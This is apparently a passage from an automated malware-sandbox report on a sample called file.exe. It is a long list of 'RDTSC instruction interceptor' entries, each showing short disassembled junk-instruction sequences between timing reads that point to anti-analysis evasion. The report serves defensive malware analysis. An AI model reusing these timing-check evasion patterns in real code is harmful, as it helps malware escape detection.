                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3AD6 second address: CA3ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA3EA7 second address: CA3EC6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 js 00007FA22C516E36h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA22C516E3Bh 0x00000013 jne 00007FA22C516E36h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9181 second address: CA918C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA918C second address: CA9192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA92DF second address: CA92E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA92E3 second address: CA92E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA95E6 second address: CA95ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA8CA7 second address: CA8D18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FA22C516E50h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA22C516E48h 0x00000016 je 00007FA22C516E3Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FA22C516E47h 0x00000023 jmp 00007FA22C516E44h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA99CA second address: CA99CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA99CE second address: CA99D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA99D2 second address: CA99D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA99D8 second address: CA99E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA99E4 second address: CA99EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA99EC second address: CA99FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FA22C516E36h 0x0000000a jc 00007FA22C516E36h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA99FC second address: CA9A21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB5h 0x00000007 jnc 00007FA22C835FA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9A21 second address: CA9A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9B7F second address: CA9B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9B85 second address: CA9B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC1C7 second address: CAC1D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA22C835FA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC1D3 second address: CAC1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF85A second address: CAF86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA22C835FA6h 0x0000000a je 00007FA22C835FA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF86C second address: CAF892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FA22C516E49h 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF892 second address: CAF898 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF898 second address: CAF89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF373 second address: CAF377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF377 second address: CAF391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA22C516E44h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1E51 second address: CB1E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB1E55 second address: CB1E71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA22C516E42h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB689B second address: CB68A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB68A1 second address: CB68CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FA22C516E38h 0x0000000c jmp 00007FA22C516E46h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6A26 second address: CB6A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6A2C second address: CB6A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FA22C516E3Ch 0x0000000b popad 0x0000000c jl 00007FA22C516E5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6A48 second address: CB6A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6A4E second address: CB6A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6BCC second address: CB6BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA22C835FA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6D47 second address: CB6D53 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6D53 second address: CB6D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6D62 second address: CB6D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6D68 second address: CB6D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6D71 second address: CB6D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6D75 second address: CB6D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5D9BB second address: C5D9C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7BDD second address: CB7BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7BE1 second address: CB7BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7BE5 second address: CB7C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA22C835FB8h 0x0000000d pushad 0x0000000e jmp 00007FA22C835FB7h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBC08B second address: CBC0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FA22C516E43h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBBB0E second address: CBBB14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0039 second address: CC003D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC003D second address: CC0043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF964 second address: CBF969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF969 second address: CBF96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBF96F second address: CBF975 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBFD6E second address: CBFDA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 jmp 00007FA22C835FB7h 0x0000000d jmp 00007FA22C835FADh 0x00000012 pop eax 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7391 second address: CC73B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA22C516E46h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC73B3 second address: CC73C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FACh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7664 second address: CC766F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC79AB second address: CC79AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC79AF second address: CC79B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7ED0 second address: CC7EE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA22C835FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7EE1 second address: CC7EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA22C516E36h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC7EEF second address: CC7F0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA22C835FA6h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e jmp 00007FA22C835FABh 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8500 second address: CC8538 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FA22C516E40h 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA22C516E49h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8538 second address: CC8540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8540 second address: CC8544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC87E7 second address: CC87F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jbe 00007FA22C835FA8h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8ADE second address: CC8B0D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA22C516E43h 0x00000008 jmp 00007FA22C516E3Bh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jno 00007FA22C516E42h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a push esi 0x0000001b pop esi 0x0000001c pop ebx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8B0D second address: CC8B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA22C835FA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8DC9 second address: CC8E15 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA22C516E36h 0x00000008 jns 00007FA22C516E36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FA22C516E42h 0x00000015 jp 00007FA22C516E3Ch 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007FA22C516E40h 0x00000024 jns 00007FA22C516E36h 0x0000002a popad 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8E15 second address: CC8E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8E1D second address: CC8E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8E22 second address: CC8E2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FA22C835FA6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCAA47 second address: CCAA6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FA22C516E3Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 jp 00007FA22C516E36h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCAA6B second address: CCAA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FB8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCC1DD second address: CCC1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FA22C516E36h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6E01 second address: CD6E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6E0A second address: CD6E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F78 second address: CD6F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F81 second address: CD6F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F87 second address: CD6F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6F8B second address: CD6F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE06E1 second address: CE06E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE06E6 second address: CE06EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE06EE second address: CE06F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE986 second address: CDE9BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E45h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA22C516E49h 0x0000000e jng 00007FA22C516E36h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE9BE second address: CDE9CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FA22C835FB8h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEE1E second address: CDEE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007FA22C516E36h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEFB8 second address: CDEFC4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007FA22C835FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEFC4 second address: CDEFCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FA22C516E36h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEFCE second address: CDEFD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF293 second address: CDF2A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E3Fh 0x00000009 pop edi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF2A7 second address: CDF2AC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF2AC second address: CDF2B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF2B4 second address: CDF2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF40E second address: CDF416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF416 second address: CDF421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA22C835FA6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF7D3 second address: CDF7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jo 00007FA22C516E3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF7E0 second address: CDF7F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 push esi 0x00000009 pop esi 0x0000000a jng 00007FA22C835FA6h 0x00000010 pop esi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFEA1 second address: CDFEA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFEA7 second address: CDFEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFEAB second address: CDFEB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE56A second address: CDE56E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE56E second address: CDE58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E48h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
